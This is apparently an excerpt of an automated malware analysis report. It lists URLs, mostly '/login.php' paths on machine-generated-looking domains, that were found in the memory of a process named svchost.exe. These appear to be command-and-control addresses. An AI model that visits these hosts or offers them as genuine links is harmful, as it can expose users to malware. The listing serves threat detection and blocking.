Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/http://lykyvyx.com/http://vopyrik.com/http://vopyrik.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/
Source: svchost.exe, 00000002.00000003.1902716181.0000000008A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysox.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytar.com/login.php
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytux.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxir.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumypop.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytol.com/login.php
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytup.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832741333.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887249812.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywug.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyxul.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyboq.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycuv.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydig.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyguq.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913599148.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916058806.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjap.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymol.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868440755.0000000008A17000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymyp.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/http://pupytiq.com/http://qebyhag.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupytiq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purybup.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycul.com/login.php
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purydip.com/P:
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1936268348.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypig.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypyq.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxag.com/login.php
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.1836522113.0000000008B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/H
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844445717.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845203467.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/0;
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/H
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840385110.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839709376.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyq.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyliv.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvypoq.com/
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/H
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytuq.com/http://puvytuq.com/H
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1882273113.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywup.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxig.com/login.php
Source: svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyxig.com/login.phpg
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
